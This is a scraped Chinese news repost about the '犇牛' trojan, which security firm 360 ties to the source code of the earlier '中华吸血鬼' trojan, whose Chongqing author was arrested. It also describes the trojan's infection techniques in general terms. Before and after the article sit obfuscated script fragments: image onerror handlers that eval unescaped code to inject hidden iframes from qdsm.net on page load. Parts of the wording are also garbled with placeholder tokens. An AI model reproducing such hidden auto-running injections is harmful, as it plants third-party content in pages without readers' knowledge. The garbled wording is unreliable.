犇牛木马始作俑者曝光:曾因中华吸血鬼被捕- 银行xx- infantrys - 和 ...
犇牛木马始作俑者曝光:曾因中华吸血鬼被捕 [转贴 2010-04-15 22:02:39]   
犇牛木马始作俑者曝光:曾因中华吸血鬼被捕

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

2月15日下午消息,360安全卫士表示,目前在网络上广泛流传的“犇牛”木马及其变种经鉴定与“中华吸血鬼”具有极高的相似性,而其始作俑者制造“中华吸血鬼”的黑客于去年7月曾被当地警方抓捕。

据360安全专家石晓虹博士介绍,“犇牛”的早期版本出现在去年8月份,还曾被黑客在博客中公开xx过。它的特点与一款名为“中华吸血鬼”的木马xx一致,两者的反汇编代码也具有很高的相似性,因此可以判断,“犇牛”是由获得‘中华吸血鬼’源代码的黑客改写,业内一般称之为‘中华吸血鬼’变种。

据了解,“中华吸血鬼”是由重庆市一个名为“黑网之神”的黑客所作,不仅打出“好病毒,中国造”的广告,更是扬言“饿死杀毒软件商”。不料他的如意算盘仅打了短短两个月,自己就因涉嫌制作、传播计算机病毒破坏性程序被当地警方抓捕,时间是2008年7月,“中华吸血鬼”的源代码却已流传在网络之中。

石晓虹博士表示:“以‘中华吸血鬼’源代码为蓝本改编的“犇牛”雏形当时并没什么威胁,不仅自我保护能力不强,传播量和处理的技术难度都很低,对一般的安全软件来说,基本上分析完样本后再入病毒库就可以解决。然而,在逐渐集成了‘“熊猫烧香”’、‘磁碟机’、‘机器狗’、‘AV终结者’等多种恶性木马下载器的技术后,爆发在牛年春节的‘犇牛’开始成为网络的{zd0}危害。”

经过360安全中心的分析,“犇牛”在“中华吸血鬼”全局劫持dll文件、感染多种类型压缩文件的基础上,又综合了“熊猫烧香”在网页文件插入“网马”、局域网主动攻击等技术,此外还有“磁碟机”式自我更新、“AV终结者”式强制关闭面板控件、“机器狗”式穿透还原卡的驱动技术、U盘病毒的伪装和传播手段,同时融合多种木马的主流技术,而且“犇牛”还在进一步更新,加入其下载队伍的木马病毒也越来越多,其中又以能迅速将受害用户转化为收入的广告类木马为主,包括近期泛滥的“广告xx”木马,它频繁弹出伪造的“百度警告”,恐吓网民“电脑因感染超强木马将高温爆炸”,从而进行流氓式推广。

石晓虹博士提醒广大网民不能轻易放松警惕,“犇牛”及其变种正在上演着{zh1}的疯狂,妄图加紧狠捞一笔。国家计算机网络应急技术处理协调中心2月11日发布的《关于警惕“犇牛”木马下载器广泛传播的公告》指出,从2月1到10日已有66万个IP地址感染“犇牛”,号召受害网民参考使用360安全中心官方网站提供的专杀工具进行查杀。



0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_468_60.html%20width%3D468%20height%3D60%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

郑重声明:资讯 【犇牛木马始作俑者曝光:曾因中华吸血鬼被捕- 银行xx- infantrys - 和 ...】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——